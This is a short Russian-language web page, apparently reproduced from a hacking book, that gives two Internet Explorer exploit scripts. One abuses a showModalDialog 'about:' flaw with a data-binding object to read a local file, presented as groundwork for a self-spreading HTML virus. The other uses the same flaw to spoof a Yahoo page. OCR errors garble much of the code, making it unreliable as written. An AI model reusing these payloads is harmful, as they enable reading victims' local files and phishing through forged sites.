Главная Случайная страница Контакты | Мы поможем в написании вашей работы! | ||
|
К созданию полноценного html-вируса, размножающегося при загрузке из Сети, а не только из локального
файла, как это было с вирусом HTML.Internal:
<SCRIPT>
s="about:<SCRIPT>a=window. open С view-source: x');a. document, open (); "+
"a. document, write(\"<object id='myTDC' width=100height=100"+
"classid="CLSID:333C7BC4-460F-11DO-BC04-0080C7055A83'>"+
"<param name='DataURL' value=' с:/test. txf>"+
"<param name='UseHeader' value=False>"+
"<param name='CharSet' VALUE^iso-SSSO-I^"
"<param name='FieldDelim' value='}'>"+
"<parani name='RowDelim' value='}'>"+
"<param name='TextQualifier' value='}'>"
"</object><torm><textarea datasrc='SmyTDC' datafld='Column1' rows=10 cols=80>"+
"</textarea></form>\"); a. document, write"+
"('<SCRIPT>setTimeout(\"alert(document.forms[0].elements[0].va.lue)\",4000)</SCRIPT'):"+
"a. document, write('>'); a. document, close(); close ();</"+
"SCRIPT>%01file://c:/";
b=showModalDialog(s);
</SCRIPT>
Использование этой же ошибки в целях подделки сайтов демонстрирует следующий код:
<SCRIPT>
b=showModalDialog(
"about:<SCRIPT>a=window.open(' http://www. yahoo, corn'); "
+"a. document. writeC <HTML><HEAD><TITLE>Yahoo</TITLE><BODY></HEAD>Любoйhtml-кoд'); close()</"
+"SCRIPT>%01http://www. yahoo, corn");
</SCRIPT>
Дата публикования: 2014-11-04; Прочитано: 330 | Нарушение авторского права страницы | Мы поможем в написании вашей работы!